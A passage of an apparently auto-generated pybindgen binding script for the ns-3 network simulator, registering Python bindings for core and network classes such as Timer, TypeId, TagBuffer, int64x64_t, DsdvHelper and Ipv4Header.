is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3Timer_methods(root_module, cls):
## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Timer const &', 'arg0')])
## timer.h (module 'core'): ns3::Timer::Timer() [constructor]
cls.add_constructor([])
## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer::DestroyPolicy destroyPolicy) [constructor]
cls.add_constructor([param('ns3::Timer::DestroyPolicy', 'destroyPolicy')])
## timer.h (module 'core'): void ns3::Timer::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelay() const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[],
is_const=True)
## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelayLeft() const [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[],
is_const=True)
## timer.h (module 'core'): ns3::Timer::State ns3::Timer::GetState() const [member function]
cls.add_method('GetState',
'ns3::Timer::State',
[],
is_const=True)
## timer.h (module 'core'): bool ns3::Timer::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## timer.h (module 'core'): bool ns3::Timer::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## timer.h (module 'core'): bool ns3::Timer::IsSuspended() const [member function]
cls.add_method('IsSuspended',
'bool',
[],
is_const=True)
## timer.h (module 'core'): void ns3::Timer::Remove() [member function]
cls.add_method('Remove',
'void',
[])
## timer.h (module 'core'): void ns3::Timer::Resume() [member function]
cls.add_method('Resume',
'void',
[])
## timer.h (module 'core'): void ns3::Timer::Schedule() [member function]
cls.add_method('Schedule',
'void',
[])
## timer.h (module 'core'): void ns3::Timer::Schedule(ns3::Time delay) [member function]
cls.add_method('Schedule',
'void',
[param('ns3::Time', 'delay')])
## timer.h (module 'core'): void ns3::Timer::SetDelay(ns3::Time const & delay) [member function]
cls.add_method('SetDelay',
'void',
[param('ns3::Time const &', 'delay')])
## timer.h (module 'core'): void ns3::Timer::Suspend() [member function]
cls.add_method('Suspend',
'void',
[])
return
def register_Ns3TimerImpl_methods(root_module, cls):
## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl() [constructor]
cls.add_constructor([])
## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl(ns3::TimerImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimerImpl const &', 'arg0')])
## timer-impl.h (module 'core'): void ns3::TimerImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## timer-impl.h (module 'core'): ns3::EventId ns3::TimerImpl::Schedule(ns3::Time const & delay) [member function]
cls.add_method('Schedule',
'ns3::EventId',
[param('ns3::Time const &', 'delay')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function]
cls.add_method('GetHash',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function]
cls.add_method('LookupByHash',
'ns3::TypeId',
[param('uint32_t', 'hash')],
is_static=True)
## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function]
cls.add_method('LookupByHashFailSafe',
'bool',
[param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')],
is_static=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3DsdvHelper_methods(root_module, cls):
## dsdv-helper.h (module 'dsdv'): ns3::DsdvHelper::DsdvHelper(ns3::DsdvHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DsdvHelper const &', 'arg0')])
## dsdv-helper.h (module 'dsdv'): ns3::DsdvHelper::DsdvHelper() [constructor]
cls.add_constructor([])
## dsdv-helper.h (module 'dsdv'): ns3::DsdvHelper * ns3::DsdvHelper::Copy() const [member function]
cls.add_method('Copy',
'ns3::DsdvHelper *',
[],
is_const=True, is_virtual=True)
## dsdv-helper.h (module 'dsdv'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::DsdvHelper::Create(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_const=True, is_virtual=True)
## dsdv-helper.h (module 'dsdv'): void ns3::DsdvHelper::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Ipv4Header_methods(root_module, cls):
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header(ns3::Ipv4Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header() [constructor]
cls.add_constructor([])
## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::DscpTypeToString(ns3::Ipv4Header::DscpType dscp) const [member function]
cls.add_method('DscpTypeToString',
'std::string',
[param('ns3::Ipv4Header::DscpType', 'dscp')],
is_const=True)
## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::EcnTypeToString(ns3::Ipv4Header::EcnType ecn) const [member function]
cls.add_method('EcnTypeToString',
'std::string',
[param('ns3::Ipv4Header::EcnType', 'ecn')],
is_const=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::EnableChecksum() [member function]
cls.add_method('EnableChecksum',
'void',
[])
## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType ns3::Ipv4Header::GetDscp() const [member function]
cls.add_method('GetDscp',
'ns3::Ipv4Header::DscpType',
[],
is_const=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType ns3::Ipv4Header::GetEcn() const [member function]
cls.add_method('GetEcn',
'ns3::Ipv4Header::EcnType',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetFragmentOffset() const [member function]
cls.add_method('GetFragmentOffset',
'uint16_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetIdentification() const [member function]
cls.add_method('GetIdentification',
'uint16_t',
[],
is_const=True)
